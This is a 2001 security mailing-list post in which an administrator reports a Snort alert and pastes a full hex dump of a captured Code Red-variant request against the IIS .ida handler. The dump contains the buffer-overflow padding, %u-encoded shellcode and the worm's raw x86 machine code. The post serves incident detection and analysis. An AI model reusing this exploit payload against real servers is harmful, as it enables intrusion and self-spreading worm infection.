Just sitting here and enjoying my new snort rules. Then a packet that reports not the codered variant but the plain old .ida access warning. The mandatory look into the payload reveals: the next variant Only occurance twice from the same ip-adress to the same ip-adress. The relatively quick check reveals a dial-up system that claims to use an apache server and SuSE-Linux. Reported him to the provider and we'll see what happens Payload: length = 1526 000 : 47 45 54 20 2F 64 65 66 61 75 6C 74 2E 69 64 61 GET /default.ida 010 : 3F 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E ?NNNNNNNNNNNNNNN 020 : 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E NNNNNNNNNNNNNNNN 030 : 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E NNNNNNNNNNNNNNNN 040 : 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E NNNNNNNNNNNNNNNN 050 : 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E NNNNNNNNNNNNNNNN 060 : 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E NNNNNNNNNNNNNNNN 070 : 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E NNNNNNNNNNNNNNNN 080 : 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E NNNNNNNNNNNNNNNN 090 : 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E NNNNNNNNNNNNNNNN 0a0 : 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E NNNNNNNNNNNNNNNN 0b0 : 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E NNNNNNNNNNNNNNNN 0c0 : 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E NNNNNNNNNNNNNNNN 0d0 : 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E NNNNNNNNNNNNNNNN 0e0 : 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E NNNNNNNNNNNNNNNN 0f0 : 4E 25 75 39 30 39 30 25 75 36 38 35 38 25 75 63 N%u9090%u6858%uc 100 : 62 64 33 25 75 37 38 30 31 25 75 39 30 39 30 25 bd3%u7801%u9090% 110 : 75 36 38 35 38 25 75 63 62 64 33 25 75 37 38 30 u6858%ucbd3%u780 120 : 31 25 75 39 30 39 30 25 75 36 38 35 38 25 75 63 1%u9090%u6858%uc 130 : 62 64 33 25 75 37 38 30 31 25 75 39 30 39 30 25 bd3%u7801%u9090% 140 : 75 39 30 39 30 25 75 38 31 39 30 25 75 30 30 63 u9090%u8190%u00c 150 : 33 25 75 30 30 30 33 25 75 38 62 30 30 25 75 35 3%u0003%u8b00%u5 160 : 33 31 62 25 75 35 33 66 66 25 75 30 30 37 38 25 31b%u53ff%u0078% 170 : 75 30 30 30 30 25 75 30 30 3D 61 20 20 48 54 54 u0000%u00=a HTT 180 : 50 2F 31 2E 30 0D 0A 43 6F 6E 74 65 6E 74 2D 74 P/1.0..Content-t 190 : 79 70 65 3A 20 74 65 78 74 2F 78 6D 6C 0A 48 4F ype: text/xml.HO 1a0 : 53 54 3A 77 77 77 2E 77 6F 72 6D 2E 63 6F 6D 0A ST:www.worm.com. 1b0 : 20 41 63 63 65 70 74 3A 20 2A 2F 2A 0A 43 6F 6E Accept: */*.Con 1c0 : 74 65 6E 74 2D 6C 65 6E 67 74 68 3A 20 33 35 36 tent-length: 356 1d0 : 39 20 0D 0A 0D 0A 55 8B EC 81 EC 18 02 00 00 53 9 ....U........S 1e0 : 56 57 8D BD E8 FD FF FF B9 86 00 00 00 B8 CC CC VW.............. 1f0 : CC CC F3 AB C7 85 70 FE FF FF 00 00 00 00 E9 0A ......p......... 200 : 0B 00 00 8F 85 68 FE FF FF 8D BD F0 FE FF FF 64 .....h.........d 210 : A1 00 00 00 00 89 47 08 64 89 3D 00 00 00 00 E9 ......G.d.=..... 220 : 6F 0A 00 00 8F 85 60 FE FF FF C7 85 F0 FE FF FF o.....`......... 230 : FF FF FF FF 8B 85 68 FE FF FF 83 E8 07 89 85 F4 ......h......... 240 : FE FF FF C7 85 58 FE FF FF 00 00 E0 77 E8 9B 0A .....X......w... 250 : 00 00 83 BD 70 FE FF FF 00 0F 85 DD 01 00 00 8B ....p........... 260 : 8D 58 FE FF FF 81 C1 00 00 01 00 89 8D 58 FE FF .X...........X.. 270 : FF 81 BD 58 FE FF FF 00 00 00 78 75 0A C7 85 58 ...X......xu...X 280 : FE FF FF 00 00 F0 BF 8B 95 58 FE FF FF 33 C0 66 .........X...3.f 290 : 8B 02 3D 4D 5A 00 00 0F 85 9A 01 00 00 8B 8D 58 ..=MZ..........X 2a0 : FE FF FF 8B 51 3C 8B 85 58 FE FF FF 33 C9 66 8B ....Q<..X...3.f. 2b0 : 0C 10 81 F9 50 45 00 00 0F 85 79 01 00 00 8B 95 ....PE....y..... 2c0 : 58 FE FF FF 8B 42 3C 8B 8D 58 FE FF FF 8B 54 01 X....B<..X....T. 2d0 : 78 03 95 58 FE FF FF 89 95 54 FE FF FF 8B 85 54 x..X.....T.....T 2e0 : FE FF FF 8B 48 0C 03 8D 58 FE FF FF 89 8D 4C FE ....H...X.....L. 2f0 : FF FF 8B 95 4C FE FF FF 81 3A 4B 45 52 4E 0F 85 ....L....:KERN.. 300 : 33 01 00 00 8B 85 4C FE FF FF 81 78 04 45 4C 33 3.....L....x.EL3 310 : 32 0F 85 20 01 00 00 8B 8D 58 FE FF FF 89 8D 34 2.. .....X.....4 320 : FE FF FF 8B 95 54 FE FF FF 8B 85 58 FE FF FF 03 .....T.....X.... 330 : 42 20 89 85 4C FE FF FF C7 85 48 FE FF FF 00 00 B ..L.....H..... 340 : 00 00 EB 1E 8B 8D 48 FE FF FF 83 C1 01 89 8D 48 ......H........H 350 : FE FF FF 8B 95 4C FE FF FF 83 C2 04 89 95 4C FE .....L........L. 360 : FF FF 8B 85 54 FE FF FF 8B 8D 48 FE FF FF 3B 48 ....T.....H...;H 370 : 18 0F 8D C0 00 00 00 8B 95 4C FE FF FF 8B 02 8B .........L...... 380 : 8D 58 FE FF FF 81 3C 01 47 65 74 50 0F 85 A0 00 .X....<.GetP.... 390 : 00 00 8B 95 4C FE FF FF 8B 02 8B 8D 58 FE FF FF ....L.......X... 3a0 : 81 7C 01 04 72 6F 63 41 0F 85 84 00 00 00 8B 95 .|..rocA........ 3b0 : 48 FE FF FF 03 95 48 FE FF FF 03 95 58 FE FF FF H.....H.....X... 3c0 : 8B 85 54 FE FF FF 8B 48 24 33 C0 66 8B 04 0A 89 ..T....H$3.f.... 3d0 : 85 4C FE FF FF 8B 8D 54 FE FF FF 8B 51 10 8B 85 .L.....T....Q... 3e0 : 4C FE FF FF 8D 4C 10 FF 89 8D 4C FE FF FF 8B 95 L....L....L..... 3f0 : 4C FE FF FF 03 95 4C FE FF FF 03 95 4C FE FF FF L.....L.....L... 400 : 03 95 4C FE FF FF 03 95 58 FE FF FF 8B 85 54 FE ..L.....X.....T. 410 : FF FF 8B 48 1C 8B 14 0A 89 95 4C FE FF FF 8B 85 ...H......L..... 420 : 4C FE FF FF 03 85 58 FE FF FF 89 85 70 FE FF FF L.....X.....p... 430 : EB 05 E9 0D FF FF FF E9 16 FE FF FF 8D BD F0 FE ................ 440 : FF FF 8B 47 08 64 A3 00 00 00 00 83 BD 70 FE FF ...G.d.......p.. 450 : FF 00 75 05 E9 38 08 00 00 C7 85 4C FE FF FF 01 ..u..8.....L.... 460 : 00 00 00 EB 0F 8B 8D 4C FE FF FF 83 C1 01 89 8D .......L........ 470 : 4C FE FF FF 8B 95 68 FE FF FF 0F BE 02 85 C0 0F L.....h......... 480 : 84 8D 00 00 00 8B 8D 68 FE FF FF 0F BE 11 83 FA .......h........ 490 : 09 75 21 8B 85 68 FE FF FF 83 C0 01 8B F4 50 FF .u!..h........P. 4a0 : 95 90 FE FF FF 3B F4 90 43 4B 43 4B 89 85 34 FE .....;..CKCK..4. 4b0 : FF FF EB 2A 8B F4 8B 8D 68 FE FF FF 51 8B 95 34 ...*....h...Q..4 4c0 : FE FF FF 52 FF 95 70 FE FF FF 3B F4 90 43 4B 43 ...R..p...;..CKC 4d0 : 4B 8B 8D 4C FE FF FF 89 84 8D 8C FE FF FF EB 0F K..L............ 4e0 : 8B 95 68 FE FF FF 83 C2 01 89 95 68 FE FF FF 8B ..h........h.... 4f0 : 85 68 FE FF FF 0F BE 08 85 C9 74 02 EB E2 8B 95 .h........t..... 500 : 68 FE FF FF 83 C2 01 89 95 68 FE FF FF E9 53 FF h........h....S. 510 : FF FF 8B 85 68 FE FF FF 83 C0 01 89 85 68 FE FF ....h........h.. 520 : FF 8B 4D 08 8B 91 84 00 00 00 89 95 6C FE FF FF ..M.........l... 530 : C7 85 4C FE FF FF 04 00 00 00 C6 85 D0 FE FF FF ..L............. 540 : 68 8B 45 08 89 85 D1 FE FF FF C7 85 D5 FE FF FF h.E............. 550 : 5B 53 53 FF C7 85 D9 FE FF FF 63 78 90 90 8B 4D [SS.......cx...M 560 : 08 8B 51 10 89 95 50 FE FF FF 83 BD 50 FE FF FF ..Q...P.....P... 570 : 00 75 26 8B F4 6A 00 8D 85 4C FE FF FF 50 8B 8D .u&..j...L...P.. 580 : 68 FE FF FF 51 8B 55 08 8B 42 08 50 FF 95 6C FE h...Q.U..B.P..l. 590 : FF FF 3B F4 90 43 4B 43 4B 83 BD 50 FE FF FF 64 ..;..CKCK..P...d 5a0 : 7D 5C 8B 8D 50 FE FF FF 83 C1 01 89 8D 50 FE FF }\..P........P.. 5b0 : FF 8B 95 50 72 25 35 44 3D 30 26 66 75 6E 63 73 ...Pr%5D=0&funcs 5c0 : 25 35 42 69 6E 76 69 73 69 62 6C 65 25 35 44 3D %5Binvisible%5D= 5d0 : 26 66 69 65 6C 64 73 25 35 42 69 6E 76 69 73 69 &fields%5Binvisi 5e0 : 62 6C 65 25 35 44 3D 54 68 6F 72 73 74 65 6E 2B ble%5D=Thorsten+ 5f0 : 4B 69 6C 69 61 6E Kilian Comments anyone ? CU Sven ---------------------------------------------------------------------------- This list is provided by the SecurityFocus ARIS analyzer service. For more information on this free incident handling, management and tracking system please see: http://aris.securityfocus.com
This archive was generated by hypermail 2b30 : Sun Aug 05 2001 - 13:39:50 PDT